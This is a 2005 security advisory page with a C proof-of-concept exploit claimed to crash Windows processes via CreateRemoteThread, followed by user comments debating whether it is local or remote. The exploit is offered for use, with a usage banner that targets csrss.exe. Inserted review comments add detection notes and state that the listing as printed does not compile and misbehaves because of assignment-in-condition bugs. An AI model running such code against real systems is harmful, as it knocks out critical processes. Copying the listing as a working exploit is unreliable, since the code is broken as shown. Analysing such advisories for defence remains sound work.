| The following exploit calls the function CreateRemoteThread() with the parameters "Process,0,0,x,0,0,0", which in turn causes all the processes opened by the OpenProcess function to crash, effectively causing a DoS. |
Credit:
The information has been provided by Nima Salehi.
The original article can be found at: http://www.ashiyane.com/
Vulnerable Systems:
* Windows XP SP 2 and prior
* Windows 2000 PRO SP 4 and prior
* Windows 2000 Server SP 4 and prior
* Windows 2000 AdvServer SP 4 and prior
* Windows 2003 AdvServer SP 1 and prior
Exploit:
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
/*
 * exploit: local denial-of-service proof of concept from the advisory above.
 *
 * What the visible code does, in order:
 *   1. enables SE_DEBUG_NAME (SeDebugPrivilege) on the caller's own token;
 *   2. walks a Toolhelp process snapshot looking for chProcessName
 *      (case-insensitive image-name match);
 *   3. opens the match with PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION and
 *      starts a thread in it whose start address is the integer 100.
 * The advisory text describes the result as the opened process crashing.
 *
 * Defender notes:
 *   - AdjustTokenPrivileges can only enable a privilege the token already
 *     holds, so the caller must already run with SeDebugPrivilege
 *     (administrator-level). No privilege boundary is crossed, which is the
 *     point the kromrey comment further down the page makes.
 *   - Thread creation in a foreign process is a standard telemetry signal
 *     (e.g. Sysmon event ID 8, CreateRemoteThread); an unexpected remote
 *     thread with an unmapped start address in a system process is a
 *     reasonable thing to alert on.
 *
 * Parameter: chProcessName - image file name to look for (main passes argv[1]).
 * Returns:   FALSE on most failure paths; on the final path it returns the
 *            target PID converted to BOOL (int), not TRUE.
 *
 * NOTE(review): as printed the listing is not functional - see the comments
 * on the `=`-in-condition lines below.
 */
BOOL exploit(char* chProcessName)
{
HANDLE hProcessSnap = NULL;
HANDLE hProcess = NULL;
BOOL bFound = FALSE;
BOOL bRet = FALSE;                 /* unused */
PROCESSENTRY32 pe32 = {0};
UINT uExitCode = 0;                /* unused */
DWORD dwExitCode = 0;              /* unused */
LPDWORD lpExitCode = &dwExitCode;  /* unused */
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
/* Step 1: enable SeDebugPrivilege on this process's own token. */
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY | TOKEN_READ,&hToken))
return FALSE;
/* NOTE(review): this failure path returns TRUE (inconsistent with every
 * other error path in the function) and leaks hToken. */
if(!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))
return TRUE;
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
/* `1 ? x : 0` always yields x; this is simply SE_PRIVILEGE_ENABLED. */
tp.Privileges[0].Attributes = 1 ? SE_PRIVILEGE_ENABLED : 0;
/* Neither the return value nor GetLastError is checked. If the token does
 * not hold the privilege the call still returns TRUE with
 * ERROR_NOT_ALL_ASSIGNED and nothing is enabled. */
AdjustTokenPrivileges(hToken,FALSE,&tp,0,0,0);
CloseHandle(hToken);
/* Step 2: locate the target by image name in a process snapshot. */
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
/* NOTE(review): `=` is assignment, not comparison. INVALID_HANDLE_VALUE is
 * non-zero, so this branch is always taken, the function always returns
 * FALSE here, and the real snapshot handle is overwritten and leaked. */
if (hProcessSnap = INVALID_HANDLE_VALUE)
return (FALSE);
pe32.dwSize = sizeof(PROCESSENTRY32);
printf("\n[+] Search For Process ... \n");
/* The documented Toolhelp sequence is Process32First then Process32Next;
 * starting with Process32Next is not guaranteed to visit the first entry. */
while(!bFound && Process32Next(hProcessSnap, &pe32))
{
/* NOTE(review): assigning to a function-call result is not valid C
 * (lvalue required), so this line does not compile as printed. szExeFile
 * is TCHAR, so the compare also assumes an ANSI (non-UNICODE) build. */
if(lstrcmpi(pe32.szExeFile, chProcessName) = 0)
bFound = TRUE;
}
CloseHandle(hProcessSnap);
if(!bFound){
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_RED| FOREGROUND_INTENSITY) ;
printf("[-] Sorry Process Not Find \n");
return(FALSE);
}
printf("[+] Process Find \n");
/* Step 3: open the target with only the rights needed to create a thread. */
hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION, FALSE, pe32.th32ProcessID);
/* NOTE(review): `=` again: hProcess is set to NULL, the condition is false,
 * and execution continues with a NULL handle. The handle returned by
 * OpenProcess is lost and never closed. */
if(hProcess = NULL){
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_RED| FOREGROUND_INTENSITY) ;
printf("[-] Exploit Failed :( \n");
return(FALSE);
}
printf("[+] Send Exploit To Process ...\n");
/* The "payload" is a thread start address of 100, i.e. not a mapped code
 * address; the advisory says executing it crashes the target. The returned
 * thread handle is discarded and the result is not checked, so the
 * "Successful" line below prints regardless of outcome. */
CreateRemoteThread(hProcess,0,0,(DWORD (__stdcall *)(void *))100,0,0,0);
printf("[+] Successful :)\n");
/* Returns the PID narrowed to BOOL (int) rather than TRUE; main ignores it. */
return(pe32.th32ProcessID);
}
/*
 * main: clears the console, then either prints the usage banner (when the
 * argument count is not exactly 2) or calls exploit() with argv[1].
 *
 * argv[1] is read before argc is checked; with argc == 1 that is argv[argc],
 * which the C standard guarantees is NULL, so the read itself is harmless
 * and exploit() is not reached in that case. exploit()'s return value is
 * ignored. There is no explicit return from main: C99 treats falling off the
 * end as `return 0`, older compilers leave the exit status unspecified.
 */
int main(int argc,char **argv)
{
char* chProcess = argv[1];
/* Console clear: fill the whole screen buffer with spaces and the current
 * attribute, then home the cursor. No return value is checked. If stdout is
 * not a console (e.g. redirected) GetConsoleScreenBufferInfo fails and csbi
 * is read uninitialized on the dwConSize line, which is undefined behavior. */
COORD coordScreen = { 0, 0 };
DWORD cCharsWritten;
CONSOLE_SCREEN_BUFFER_INFO csbi;
DWORD dwConSize;
HANDLE hConsole = GetStdHandle(STD_OUTPUT_HANDLE);
GetConsoleScreenBufferInfo(hConsole, &csbi);
dwConSize = csbi.dwSize.X * csbi.dwSize.Y;
FillConsoleOutputCharacter(hConsole, TEXT(' '), dwConSize, coordScreen, &cCharsWritten);
GetConsoleScreenBufferInfo(hConsole, &csbi);
FillConsoleOutputAttribute(hConsole, csbi.wAttributes, dwConSize, coordScreen, &cCharsWritten);
SetConsoleCursorPosition(hConsole, coordScreen);
/* Banner colour; the attribute is changed twice more inside the banner and
 * reset to plain white at the end of main. */
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_GREEN| FOREGROUND_INTENSITY) ;
if(argc !=2) {
printf("\n");
printf(" ===================================== \n");
printf(" > Microsoft Windows CreateRemoteThread Exploit Version 2.0 (0day) < \n");
printf(" > Now All Process Will Crash < \n");
printf(" > BUG Find By Q7X ( Nima Salehi ) Q7X@Ashiyane.com < \n");
printf(" > Exploited By Q7X ( Nima Salehi ) Q7X@Ashiyane.com < \n");
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_RED | FOREGROUND_INTENSITY|FOREGROUND_GREEN|FOREGROUND_BLUE);
printf(" > Compile : cl -o nima.c ( Win32/VC++ ) < \n");
printf(" > Usage : nima.exe Process < \n");
printf(" > Example : nima.exe csrss.exe < \n");
printf(" > Tested on : Windows XP (SP0 ,SP1 ,SP2) , Windows 2000 AdvServer (SP4) < \n");
printf(" > Windows 2000 Server (SP4), Windows 2003 (SP0 , SP1) < \n");
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_RED| FOREGROUND_INTENSITY) ;
printf(" > Copyright 2002-2005 By Ashiyane Digital Network Security Team < \n");
printf(" > www.Ashiyane.com ( Free ) www.Ashiyane.net ( Not Free ) < \n");
printf(" > Special Tanx To My Best Friends : Behrooz_Ice - ActionSpider < \n");
printf(" > illwill - m_lover_2003 - silversmith - crash - Uranium < \n");
printf(" ===================================== \n");
}
else
/* Result (FALSE / TRUE / PID) is discarded; no success or failure exit code. */
exploit(chProcess);
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_RED |FOREGROUND_GREEN|FOREGROUND_BLUE);
}
/* EoF */
| Subject:
Remote or local |
Date: |
8 Dec. 2005 |
| From: |
BORODAC |
Usage : nima.exe Process
Remote or local Exploit? |
| Subject:
CreateRemoteThread DoS |
Date: |
11 Dec. 2005 |
| From: |
hienmv0408 |
| This is a bug for DDoS |
| Subject:
I dont understand how this is DOS |
Date: |
18 Dec. 2005 |
| From: |
kromrey |
| Don't like defending windows.. But if you have the SE_DEBUG_NAME privilege this seems to me one of many possible ways you could cause a process to terminate. With the SE_DEBUG_NAME looks like there are a lot of ways that you could bring a process down. What am I missing? |
| Subject:
RE: Remote or local |
Date: |
25 Dec. 2005 |
| From: |
flfwxp |
| It's a local exploit; the word "remote" comes from the CreateRemoteThread function name, so don't get confused. |
| Subject:
A {Remote or local} |
Date: |
26 Dec. 2005 |
| From: |
LightWolf |
| This is Local Exploit. |
| Subject:
Excellent |
Date: |
4 Jan. 2006 |
| From: |
IRSDL |
| You can be the best now! ;) I hope for a secure world for everyone, especially Iranians.
| Subject:
That's Great |
Date: |
20 Dec. 2007 |
| From: |
Toomaj.Rasht.Boy |
A local exploit is a method for reaching process level on the local machine, and your exploit runs there itself,
but with a remote exploit you can reach process level on a remote computer.
So your exploit is a local one, and you should run it on the local computer.
Very nice, that's an Iranian exploit |